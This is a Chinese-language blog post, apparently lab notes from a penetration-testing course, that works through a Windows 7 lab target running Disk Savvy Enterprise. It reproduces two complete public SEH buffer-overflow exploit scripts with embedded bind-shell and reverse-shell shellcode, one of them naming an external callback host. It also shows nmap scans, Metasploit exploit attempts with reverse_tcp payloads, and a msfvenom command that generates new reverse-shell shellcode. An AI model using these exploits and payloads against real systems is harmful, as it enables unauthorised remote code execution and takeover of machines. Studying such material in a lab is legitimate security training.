滲透測試基本技術 第三章 (002)


Posted by nathan2009729 on 2023-03-26

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.1.87
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 22:52 EST
Nmap scan report for 172.16.1.87
Host is up (0.041s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
9124/tcp  open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.89 seconds

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p80,135,139,445,9124,49152-49157 172.16.1.87 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 22:54 EST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 22:56 (0:00:20 remaining)
Stats: 0:02:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 22:57 (0:00:00 remaining)
Nmap scan report for 172.16.1.87
Host is up (0.022s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|   GenericLines, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 400 Bad Request
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Content-Length: 1519
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
|     <html>
|     <head>
|     <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
|     <meta name='Author' content='Flexense HTTP Server v9.9.14'>
|     <meta name='GENERATOR' content='Flexense HTTP v9.9.14'>
|     <title>Disk Savvy Enterprise @ SEH-PC - Online Registration</title>
|     <link rel='stylesheet' type='text/css' href='resources/disksavvy.css' media='all'>
|     </head>
|     <body>
|     <div id='header'><table border=0 padding=0 cellpadding=0 cellspacing=0 width='100%'><tr>
|     width=220 align=left>Disk Savvy Enterprise v9.9.14</td>
|     <td></td>
|     width=220 align=right id='stime'>12-Mar-2023 11:54:41</td>
|     </tr></table></div>
|     <div id='content'>
|     <form method='POST' action='online_registration'>
|_    <table border=0 padding=0 cellpadding=0
|_http-generator: Flexense HTTP v9.9.14
|_http-title: Disk Savvy Enterprise @ SEH-PC - Online Registration
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9124/tcp  open  unknown
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=3/11%Time=640D4D03%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,631,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\nCon
SF:tent-Length:\x201519\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20HTML\x204\.01\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/ht
SF:ml4/loose\.dtd\">\r\n<html>\r\n<head>\r\n<meta\x20http-equiv='Content-T
SF:ype'\x20content='text/html;\x20charset=UTF-8'>\r\n<meta\x20name='Author
SF:'\x20content='Flexense\x20HTTP\x20Server\x20v9\.9\.14'>\r\n<meta\x20nam
SF:e='GENERATOR'\x20content='Flexense\x20HTTP\x20v9\.9\.14'>\r\n<title>Dis
SF:k\x20Savvy\x20Enterprise\x20@\x20SEH-PC\x20-\x20Online\x20Registration<
SF:/title>\r\n<link\x20rel='stylesheet'\x20type='text/css'\x20href='resour
SF:ces/disksavvy\.css'\x20media='all'>\r\n</head>\r\n<body>\r\n<div\x20id=
SF:'header'><table\x20border=0\x20padding=0\x20cellpadding=0\x20cellspacin
SF:g=0\x20width='100%'><tr>\r\n<td\x20width=220\x20align=left>Disk\x20Savv
SF:y\x20Enterprise\x20v9\.9\.14</td>\r\n<td></td>\r\n<td\x20width=220\x20a
SF:lign=right\x20id='stime'>12-Mar-2023\x2011:54:41</td>\r\n</tr></table><
SF:/div>\r\n<div\x20id='content'>\r\n<form\x20method='POST'\x20action='onl
SF:ine_registration'>\r\n<table\x20border=0\x20padding=0\x20cellpadding=0"
SF:)%r(HTTPOptions,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(RTSP
SF:Request,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(FourOhFourRe
SF:quest,1A,"HTTP/1\.1\x20404\x20Not\x20Found\r\n\r\n")%r(GenericLines,1C,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(SIPOptions,1C,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2 (94%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (93%), Microsoft Windows Server 2008 R2 or Windows 8 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 R1 (93%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (93%), Microsoft Windows 7 or Windows Server 2008 R2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEH-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SEH-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00155d01361c (Microsoft)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-03-12T03:57:18
|_  start_date: 2023-03-11T22:01:37
|_clock-skew: mean: -2h40m02s, deviation: 4h37m06s, median: -3s
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: SEH-PC
|   NetBIOS computer name: SEH-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-03-12T11:57:19+08:00

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   63.68 ms 192.168.200.1
2   11.68 ms 172.16.1.87

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.01 seconds

從http-title發現不熟悉的名字,找找看漏洞:

第一個:

上面那網頁下面的code:

# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
# Date: 01/02/2018
# Exploit Author: Daniel Teixeira
# Vendor Homepage: http://www.disksavvy.com/
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
# Version: 10.4.18
# CVE: CVE-2018-6481
# Tested on: Windows 7 x86


from struct import pack
from os import system
from sys import exit
from time import sleep
import socket

port = 9124
host = "172.16.40.148"

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode 
shellcode =  ""
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"

payload =  "A" * 124            # offset
payload += "\x90\x09\xeb\x05"   # jmp over seh retrun value
payload += "\x13\x6d\x05\x10"   # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)



payload += "\x90" * 10
payload += "\x83\xc4\x64" * 20  # metasm > add esp,100
payload += "\xff\xe4"           # metasm > jmp esp
payload += "\x90" * (1000 - len(payload) - len(shellcode))
payload += shellcode

header =  "\x75\x19\xba\xab"
header += "\x03\x00\x00\x00"
header += "\x00\x40\x00\x00"
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))

except:

    print "[-] Unable to communicate to target %s:%s" %(host,port)

    exit()

s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:4444 .." %host
sleep(5)
system("nc %s 4444"%host)

大概的大意是,先把dll執行完成後,再用dll載入這一段shell code。感覺不是很易用,所以看看metaspolit:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfconsole

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v6.3.2-dev                           ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search savvy

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/windows/misc/disk_savvy_adm     2017-01-31       great      No     Disk Savvy Enterprise v10.4.18
   1  exploit/windows/http/disksavvy_get_bof  2016-12-01       excellent  Yes    DiskSavvy Enterprise GET Buffer Overflow


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/disksavvy_get_bof

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/disksavvy_get_bof) > use 1
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/disksavvy_get_bof) > show options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port]
                                       [...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/doc
                                       s/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/disksavvy_get_bof) > set rhosts 172.16.1.87
rhosts => 172.16.1.87
msf6 exploit(windows/http/disksavvy_get_bof) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(windows/http/disksavvy_get_bof) > set lport 7071
lport => 7071
msf6 exploit(windows/http/disksavvy_get_bof) > show options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port]
                                       [...]
   RHOSTS   172.16.1.87      yes       The target host(s), see https://docs.metasploit.com/doc
                                       s/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     7071             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/disksavvy_get_bof) > run

[*] Started reverse TCP handler on 192.168.200.6:7071
[*] Automatically detecting the target...
[-] Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

失敗,換另一個:

msf6 exploit(windows/http/disksavvy_get_bof) > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/disk_savvy_adm) > show options

Module options (exploit/windows/misc/disk_savvy_adm):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs
                                      /using-metasploit/basics/using-metasploit.html
   RPORT   9124             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Savvy Enterprise v10.4.18



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/disk_savvy_adm) > set rhosts 172.16.1.87
rhosts => 172.16.1.87
msf6 exploit(windows/misc/disk_savvy_adm) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(windows/misc/disk_savvy_adm) > set lport 7073
lport => 7073
msf6 exploit(windows/misc/disk_savvy_adm) > show options

Module options (exploit/windows/misc/disk_savvy_adm):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.1.87      yes       The target host(s), see https://docs.metasploit.com/docs
                                      /using-metasploit/basics/using-metasploit.html
   RPORT   9124             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     7073             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Savvy Enterprise v10.4.18



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/disk_savvy_adm) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Disk Savvy Enterprise v10.4.18


msf6 exploit(windows/misc/disk_savvy_adm) > run

[*] Started reverse TCP handler on 192.168.200.6:7073
[*] Exploit completed, but no session was created.

也失敗。帶上版本號再仔細google一下:

aaa找到了新的poc

但跟剛剛網路上找的一樣,都是buffer overflow的漏洞:

#!/usr/bin/env python
# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.disksavvy.com
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connction Refused %s:%s" %(target,port)
    sys.exit(2)

packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()

看下圖,除了根據nmap結果改target跟port外,連buf也要用msfvenom重新生成。

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.200.6 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 710 (iteration=0)
x86/alpha_mixed chosen with final size 710
Payload size: 710 bytes
Final size of python file: 3511 bytes
buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
buf += b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
buf += b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
buf += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += b"\x4b\x4c\x38\x68\x4c\x42\x65\x50\x57\x70\x77\x70"
buf += b"\x61\x70\x4e\x69\x4a\x45\x75\x61\x4f\x30\x32\x44"
buf += b"\x6c\x4b\x36\x30\x30\x30\x4e\x6b\x31\x42\x34\x4c"
buf += b"\x6e\x6b\x43\x62\x55\x44\x4c\x4b\x54\x32\x44\x68"
buf += b"\x46\x6f\x6e\x57\x51\x5a\x37\x56\x35\x61\x49\x6f"
buf += b"\x4c\x6c\x55\x6c\x70\x61\x53\x4c\x57\x72\x34\x6c"
buf += b"\x31\x30\x5a\x61\x58\x4f\x64\x4d\x75\x51\x4a\x67"
buf += b"\x79\x72\x5a\x52\x66\x32\x50\x57\x4c\x4b\x50\x52"
buf += b"\x46\x70\x6c\x4b\x42\x6a\x37\x4c\x6e\x6b\x70\x4c"
buf += b"\x36\x71\x43\x48\x79\x73\x42\x68\x76\x61\x68\x51"
buf += b"\x66\x31\x6c\x4b\x31\x49\x35\x70\x43\x31\x79\x43"
buf += b"\x6c\x4b\x32\x69\x65\x48\x39\x73\x67\x4a\x43\x79"
buf += b"\x4c\x4b\x57\x44\x4e\x6b\x53\x31\x7a\x76\x76\x51"
buf += b"\x4b\x4f\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x35\x51"
buf += b"\x48\x47\x77\x48\x59\x70\x32\x55\x39\x66\x56\x63"
buf += b"\x61\x6d\x6b\x48\x75\x6b\x53\x4d\x35\x74\x42\x55"
buf += b"\x68\x64\x56\x38\x6c\x4b\x76\x38\x36\x44\x43\x31"
buf += b"\x79\x43\x75\x36\x4e\x6b\x74\x4c\x50\x4b\x6e\x6b"
buf += b"\x61\x48\x35\x4c\x75\x51\x6e\x33\x4c\x4b\x73\x34"
buf += b"\x6c\x4b\x65\x51\x4a\x70\x4b\x39\x53\x74\x31\x34"
